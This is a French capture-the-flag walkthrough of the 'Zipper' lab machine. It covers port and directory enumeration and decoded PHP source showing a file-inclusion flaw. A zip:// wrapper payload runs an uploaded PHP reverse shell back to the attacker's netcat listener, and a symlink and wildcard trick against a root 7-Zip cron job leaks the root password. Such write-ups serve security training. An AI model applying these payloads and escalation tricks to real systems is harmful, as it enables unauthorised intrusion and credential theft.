# Zipper

`LFI` `zip` `7z`

* Nom machine : Zipper
* Difficulté : Difficile
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 07:17 EDT
Nmap scan report for 192.168.242.229
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FPqIr0gkp2xrJQ47BP6bq%2F3c683c14c8b4d0b311896fc05e04bd7d.png?alt=media&#x26;token=0788ba0b-5f54-46b3-89dd-87aac0ca6699" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.242.229/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.242.229/__24-08-28_07-18-45.txt

Target: http://192.168.242.229/

[07:18:45] Starting: 
[07:18:48] 403 -  280B  - /.ht_wsr.txt
[07:18:48] 403 -  280B  - /.htaccess.bak1
[07:18:48] 403 -  280B  - /.htaccess.orig
[07:18:48] 403 -  280B  - /.htaccess.sample
[07:18:48] 403 -  280B  - /.htaccess.save
[07:18:48] 403 -  280B  - /.htaccess_extra
[07:18:48] 403 -  280B  - /.htaccess_orig
[07:18:48] 403 -  280B  - /.htaccess_sc
[07:18:48] 403 -  280B  - /.htaccessBAK
[07:18:48] 403 -  280B  - /.htaccessOLD2
[07:18:48] 403 -  280B  - /.htaccessOLD
[07:18:48] 403 -  280B  - /.htm
[07:18:48] 403 -  280B  - /.html
[07:18:48] 403 -  280B  - /.httr-oauth
[07:18:48] 403 -  280B  - /.htpasswd_test
[07:18:48] 403 -  280B  - /.htpasswds
[07:18:50] 403 -  280B  - /.php
[07:19:12] 403 -  280B  - /server-status
[07:19:12] 403 -  280B  - /server-status/
[07:19:14] 200 -  145B  - /style
[07:19:16] 200 -    0B  - /upload.php
[07:19:16] 301 -  320B  - /uploads  ->  http://192.168.242.229/uploads/
[07:19:16] 403 -  280B  - /uploads/
```

Nous avons trouvé une possible LFI. Elle va nous permettre de voir le code php derrière cette page et upload.php.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2Fs1pW5Z4jFAebXMjpIJhT%2Fa5ec080579f957b9795582a5c029c974.png?alt=media&#x26;token=8fce1c83-d570-4b4a-8ed9-72451f3351e1" alt=""><figcaption></figcaption></figure>

## Local exploitation

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FYLvVgzkXMnVcwV4wekpX%2F7aaca1853b85aa37191120edd5e0d635.png?alt=media&#x26;token=3f8b5afd-6550-4db0-b01b-46a4c67c0ba1" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ echo 'PD9waHAKJGZpbGUgPSAkX0dFVFsnZmlsZSddOwppZihpc3NldCgkZmlsZSkpCnsKICAgIGluY2x1ZGUoIiRmaWxlIi4iLnBocCIpOwp9CmVsc2UKewppbmNsdWRlKCJob21lLnBocCIpOwp9Cj8+Cg==' | base64 -d
<?php
$file = $_GET['file'];
if(isset($file))
{
    include("$file".".php");
}
else
{
include("home.php");
}
?>
```

.php est ajouté à chaque fois (nous l'avions déjà remarqué)

Regardons maintenant pour upload

```
┌──(kali㉿kali)-[~]
└─$ >....                                                            
IAogICAgICAgICR6aXAgPSBuZXcgWmlwQXJjaGl2ZSgpOwogICAgICAgICR6aXBfbmFtZSA9IGdldGN3ZCgpIC4gIi91cGxvYWRzL3VwbG9hZF8iIC4gdGltZSgpIC4gIi56aXAiOwogICAgICAgIAogICAgICAgIC8vIENyZWF0ZSBhIHppcCB0YXJnZXQKICAgICAgICBpZiAoJHppcC0+b3BlbigkemlwX25hbWUsIFppcEFyY2hpdmU6OkNSRUFURSkgIT09IFRSVUUpIHsKICAgICAgICAgICAgJGVycm9yIC49ICJTb3JyeSBaSVAgY3JlYXRpb24gaXMgbm90IHdvcmtpbmcgY3VycmVudGx5Ljxici8+IjsKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgJGltYWdlQ291bnQgPSBjb3VudCgkX0ZJTEVTWydpbWcnXVsnbmFtZSddKTsKICAgICAgICBmb3IoJGk9MDskaTwkaW1hZ2VDb3VudDskaSsrKSB7CiAgICAgICAgCiAgICAgICAgICAgIGlmICgkX0ZJTEVTWydpbWcnXVsndG1wX25hbWUnXVskaV0gPT0gJycpIHsKICAgICAgICAgICAgICAgIGNvbnRpbnVlOwogICAgICAgICAgICB9CiAgICAgICAgICAgICRuZXduYW1lID0gZGF0ZSgnWW1kSGlzJywgdGltZSgpKSAuIG10X3JhbmQoKSAuICcudG1wJzsKICAgICAgICAgICAgCiAgICAgICAgICAgIC8vIE1vdmluZyBmaWxlcyB0byB6aXAuCiAgICAgICAgICAgICR6aXAtPmFkZEZyb21TdHJpbmcoJF9GSUxFU1snaW1nJ11bJ25hbWUnXVskaV0sIGZpbGVfZ2V0X2NvbnRlbnRzKCRfRklMRVNbJ2ltZyddWyd0bXBfbmFtZSddWyRpXSkpOwogICAgICAgICAgICAKICAgICAgICAgICAgLy8gbW92aW5nIGZpbGVzIHRvIHRoZSB0YXJnZXQgZm9sZGVyLgogICAgICAgICAgICBtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snaW1nJ11bJ3RtcF9uYW1lJ11bJGldLCAnLi91cGxvYWRzLycgLiAkbmV3bmFtZSk7CiAgICAgICAgfQogICAgICAgICR6aXAtPmNsb3NlKCk7CiAgICAgICAgCiAgICAgICAgLy8gQ3JlYXRlIEhUTUwgTGluayBvcHRpb24gdG8gZG93bmxvYWQgemlwCiAgICAgICAgJHN1Y2Nlc3MgPSBiYXNlbmFtZSgkemlwX25hbWUpOwogICAgfSBlbHNlIHsKICAgICAgICAkZXJyb3IgPSAnPHN0cm9uZz5FcnJvciEhIDwvc3Ryb25nPiBQbGVhc2Ugc2VsZWN0IGEgZmlsZS4nOwogICAgfQp9Cg==' | base64 -d
<?php
if ($_FILES && $_FILES['img']) {
    
    if (!empty($_FILES['img']['name'][0])) {
        
        $zip = new ZipArchive();
        $zip_name = getcwd() . "/uploads/upload_" . time() . ".zip";
        
        // Create a zip target
        if ($zip->open($zip_name, ZipArchive::CREATE) !== TRUE) {
            $error .= "Sorry ZIP creation is not working currently.<br/>";
        }
        
        $imageCount = count($_FILES['img']['name']);
        for($i=0;$i<$imageCount;$i++) {
        
            if ($_FILES['img']['tmp_name'][$i] == '') {
                continue;
            }
            $newname = date('YmdHis', time()) . mt_rand() . '.tmp';
            
            // Moving files to zip.
            $zip->addFromString($_FILES['img']['name'][$i], file_get_contents($_FILES['img']['tmp_name'][$i]));
            
            // moving files to the target folder.
            move_uploaded_file($_FILES['img']['tmp_name'][$i], './uploads/' . $newname);
        }
        $zip->close();
        
        // Create HTML Link option to download zip
        $success = basename($zip_name);
    } else {
        $error = '<strong>Error!! </strong> Please select a file.';
    }
}
```

{% embed url="<https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/?source=post_page-----b49a52ed8e38-------------------------------->" %}

Nous allons upload un zip puis profiter de la LFI pour exploiter un fichier php se trouvant à l'intérieur.

* Nous allons tout d'abord upload php-reverse-monkey sur la cible (ici souslenom de pentest.php)
* Nous allons lancer un listeneur concordant avec notre script php
* Nous allons l'exécuter : attention nous devons enlever le .php `192.168.242.229/index.php?file=zip://uploads/upload_1724846919.zip%23pentest.php`

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.242.229] 46342
Linux zipper 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 12:10:21 up 57 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (963): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zipper:/$ whoami
whoami
www-data
```

## Escalade de privilège

```
www-data@zipper:/opt$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/backup.sh
```

```
www-data@zipper:/opt$ ls -al
ls -al
total 16
drwxr-xr-x  3 root root 4096 Aug 12  2021 .
drwxr-xr-x 20 root root 4096 Aug 12  2021 ..
-rwxr-xr-x  1 root root  153 Aug 12  2021 backup.sh
drwxr-xr-x  2 root root 4096 Aug 28 12:13 backups
www-data@zipper:/opt$ cat backup.sh
cat backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/
```

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----b49a52ed8e38--------------------------------#id-7z>" %}

La redirection est déià faite, on a plus qu'à lire backup.log

```
lrwxrwxrwx 1 www-data www-data   12 Aug 12  2021 enox.zip -> /root/secret
-rw-r--r-- 1 www-data www-data    0 Aug 12  2021 @enox.zip
```

```
www-data@zipper:/opt/backups$ cat backup.log
cat backup.log

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 6686

Scanning the drive:
14 files, 5482 bytes (6 KiB)

Updating archive: /opt/backups/backup.zip

Items to compress: 14


Files read from disk: 14
Archive size: 6686 bytes (7 KiB)

Scan WARNINGS for files and folders:

WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
```

`WildCardsGoingWild`

```
www-data@zipper:/opt/backups$ su root
su root
Password: WildCardsGoingWild
whoami
root
```